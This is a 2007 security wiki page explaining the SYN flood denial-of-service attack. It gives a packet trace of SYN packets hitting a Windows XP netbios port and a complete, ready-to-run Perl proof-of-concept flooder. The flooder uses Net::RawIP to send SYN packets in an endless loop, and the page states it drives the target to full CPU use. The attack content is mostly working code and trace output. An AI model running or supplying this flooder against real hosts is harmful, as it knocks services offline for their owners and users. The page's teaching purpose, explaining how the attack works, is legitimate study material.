MRL WikiMain Page | About | Help | FAQ | Special pages | Log in


Printable version | Disclaimers | Privacy policy

SYN Flood

From MRL Wiki

SYN Flood is a Denial of Service attack which exploits a three-way handshake (SYN -> SYN/ACK -> ACK) used in establishing of TCP connection. By sending a large number of SYN packets without ever responding to SYN/ACK responses coming from the target host, the attacker effectively creates a large number of half-open connections eventually exhausting target host's ability to process any more new connections.

Contents

[edit] Hping

[edit] Packet Trace

Below is a packet trace of a typical SYN Attack. We are sending SYN packets to netbios port on Windows XP machine:

  0.000000 192.168.1.66 -> 192.168.1.250 TCP 24345 > netbios-ssn [SYN] Seq=0 Len=0
  0.000694 192.168.1.66 -> 192.168.1.250 TCP 15869 > netbios-ssn [SYN] Seq=0 Len=0
  0.001019 192.168.1.66 -> 192.168.1.250 TCP 32851 > netbios-ssn [SYN] Seq=0 Len=0
  0.001337 192.168.1.66 -> 192.168.1.250 TCP 39007 > netbios-ssn [SYN] Seq=0 Len=0
  0.001653 192.168.1.66 -> 192.168.1.250 TCP 12675 > netbios-ssn [SYN] Seq=0 Len=0
  0.001968 192.168.1.66 -> 192.168.1.250 TCP 18094 > netbios-ssn [SYN] Seq=0 Len=0
  0.002287 192.168.1.66 -> 192.168.1.250 TCP 51402 > netbios-ssn [SYN] Seq=0 Len=0
  0.002605 192.168.1.66 -> 192.168.1.250 TCP 33243 > netbios-ssn [SYN] Seq=0 Len=0
  0.002919 192.168.1.66 -> 192.168.1.250 TCP 42948 > netbios-ssn [SYN] Seq=0 Len=0
  ...

[edit] Code

The code below is the simplest possible implementation of SYN Flooder. This poc causes 100% utilization on Windows XP SP2 with the firewall off.

#!/usr/bin/perl
# Simple POC SYN Flooder
# Requires perl, Net::RawIP module, and root privileges
use Net::RawIP;
if($#ARGV == 2) {
   ($src,$dst,$port) = @ARGV;
   $a = new Net::RawIP;
   while(1) {
      $src_port = rand(65534)+1;
      $a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn => 1}});
      $a->send;   
   }
} else {
   print "./synflooder source_ip destination_ip destination_port\n";
}

[edit] See Also

[edit] External Links

Retrieved from "http://www.midnightresearch.com/wiki/index.php/SYN_Flood"

This page has been accessed 5,333 times. This page was last modified on 21 June 2007, at 21:26.


Find

Browse
Main Page
Community portal
Current events
Recent changes
Random page
Help
Edit
Edit this page
Editing help
This page
Discuss this page
New section
Printable version
Context
Page history
What links here
Related changes
My pages
Log in / create account
Special pages
New pages
File list
Statistics
Moreā€¦